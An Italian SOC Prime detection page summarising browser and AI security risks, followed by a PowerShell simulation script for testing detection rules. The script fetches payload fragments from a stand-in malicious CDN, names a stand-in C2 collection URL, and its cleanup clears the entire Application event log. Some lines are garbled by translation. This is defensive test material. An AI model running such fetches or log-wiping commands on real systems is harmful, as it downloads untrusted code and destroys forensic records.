SOC Prime Bias: Alta

06 Apr 2026 17:25

Cinque Domande sulla Sicurezza di Browser e AI che i CxO Non Possono Ignorare

Author Photo
Ruslan Mikhalov Capo della Ricerca sulle Minacce presso SOC Prime linkedin icon Segui
Cinque Domande sulla Sicurezza di Browser e AI che i CxO Non Possono Ignorare
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

L’articolo spiega come le forze lavoro incentrate sul browser introducano una nuova concentrazione di rischi nell’ultimo miglio di accesso. Le principali esposizioni includono la perdita di dati negli strumenti di intelligenza artificiale generativa, endpoint personali non gestiti o compromessi, estensioni del browser malevole, catene di consegna di “ricomposizione” in memoria e l’uso improprio delle funzionalità di AI agentica. La conclusione è che i classici controlli di rete e endpoint non sono sufficienti da soli; le organizzazioni hanno bisogno di una visibilità coerente e di una politica applicabile direttamente nel livello del browser dove ora avviene il lavoro.

Indagine

Il rapporto fa riferimento a comportamenti come la consegna di carichi utili a pezzi che vengono ricomposti in memoria, estensioni per il furto di credenziali, spear-phishing assistiti da intelligenza artificiale e tentativi di iniezione di prompt mirati a flussi di lavoro di navigazione agentica. Cita anche dati che indicano che una quota significativa degli accessi iniziali dei ransomware inizia su dispositivi non gestiti o scarsamente governati.

Mitigazione

Palo Alto Networks posiziona Prisma Browser come il piano di controllo per applicare DLP granulare, isolare gli ambienti di lavoro aziendali su qualsiasi dispositivo, scansionare continuamente i contenuti web, monitorare le estensioni e aggiungere barriere di governance per gli agenti AI per ridurre l’esposizione centrica del browser.

Risposta

Distribuire un browser aziendale, imporre l’accesso zero-trust per i BYOD, bloccare le app AI non autorizzate, monitorare le estensioni e applicare l’ispezione DLP in tempo reale nel traffico del browser.

Flusso di Attacco

Stiamo ancora aggiornando questa parte. Iscriviti per essere notificato

Avvisami

Esecuzione della Simulazione

Prerequisito: il Controllo Pre‑flight di Telemetria e Baseline deve essere superato.

Motivazione: questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento.

  • Narrativa e Comandi di Attacco:

    1. Ricognizione e Preparazione del Carico Utile:
      • L’attaccante crea un payload JavaScript dannoso (evil.js) che ruba i cookie e li esfiltra verso un server C2.
      • Per evitare l’ispezione per byte, lo script è suddiviso in tre frammenti (part1.bin, part2.bin, part3.bin), ciascuno avvolto in un oggetto JSON dall’aspetto innocuo.
    2. Consegna via Ricomposizione HTTP:
      • Ogni frammento è ospitato su un endpoint CDN compromesso. L’attaccante attiva il browser della vittima (tramite un link di phishing) per richiedere i frammenti in sequenza. I frammenti vengono trasmessi su HTTPS e appaiono nei log del firewall come traffico web normale.
      • The Descrizione il campo dei log del firewall è arricchito manualmente dall’agente di logging dell’organizzazione per includere la stringa “Attacchi di ricomposizione” quando rileva più di 3 richieste consecutive allo stesso host entro 5 secondi con un User-Agent of Mozilla/5.0.
    3. Distribuzione di Estensioni Malevole:
      • Contemporaneamente, l’attaccante invia un’estensione Chrome malevola (evil_ext.crx) che richiede tab, cronologia, e webRequest permessi.
      • L’installazione viene eseguita tramite uno strumento di distribuzione software aziendale che scrive un evento con EventID=browser_extension and Descrizione="Estensioni del browser malevole rilevate" nel canale ManagedBrowser.
  • Script di Test di Regressione: Lo script riproduce sia il traffico di ricomposizione che l’evento di estensione malevola.

    # -------------------------------------------------
    # Script di Simulazione – Attacco di Ricomposizione & Estensione
    # -------------------------------------------------
    # Variabili
    $cdnBase   = "https://malicious-cdn.example.com/parts"
    $parts     = @("part1.bin","part2.bin","part3.bin")
    $c2Url     = "https://c2.attacker.com/collect"
    $extPath   = "$env:TEMPevil_ext.crx"
    $extId     = "abcdefg1234567890hijklmnopqrstu"   # ID fittizio
    
    # 1. Avvia i frammenti di ricomposizione (appare come HTTPS normale)
    foreach ($p in $parts) {
        Write-Host "Richiesta frammento $p ..."
        Invoke-WebRequest -Uri "$cdnBase/$p" -UseBasicParsing | Out-Null
        Start-Sleep -Milliseconds 500   # imitare richieste sequenziali rapide
    }
    
    # 2. Simula la ricomposizione nel browser (questo è solo un segnaposto)
    # In un vero attacco il browser concatenerebbe i frammenti tramite JS.
    # Qui registriamo solo un evento personalizzato per emulare l'arricchimento del rilevamento.
    $reassemblyEvent = @{
        EventID      = 2001
        ProviderName = "CustomReassemblyLogger"
        Description  = "Attacchi di ricomposizione osservati da $env:COMPUTERNAME"
        TimeCreated  = (Get-Date).ToString("o")
    }
    $json = $reassemblyEvent | ConvertTo-Json
    Write-EventLog -LogName "Application" -Source "PowerShell" -EventId 2001 -EntryType Information -Message $json
    
    # 3. Distribuisci estensione del browser malevola (scrive al canale ManagedBrowser)
    # Questo richiede privilegi amministrativi; simuli scrivendo un evento.
    $extEvent = @{
        EventID      = 1001
        Source       = "Microsoft-Windows-ManagedBrowser"
        Description  = "Estensioni del browser malevole installate: ID=$extId"
        TimeCreated  = (Get-Date).ToString("o")
    }
    $extJson = $extEvent | ConvertTo-Json
    Write-EventLog -LogName "Application" -Source "PowerShell" -EventId 1001 -EntryType Warning -Message $extJson
    
    Write-Host "Simulazione completata. Verifica gli avvisi di rilevamento."
  • Comandi di Pulizia: Rimuovere eventuali file temporanei e cancellare eventi personalizzati.

    # Rimuovere file di estensione temporanei
    Remove-Item -Path $extPath -ErrorAction SilentlyContinue
    
    # Eliminare evento personalizzato di ricomposizione (richiede amministratore – utilizzare wevtutil per cancellare)
    wevtutil cl Application
    
    Write-Host "Pulizia completata."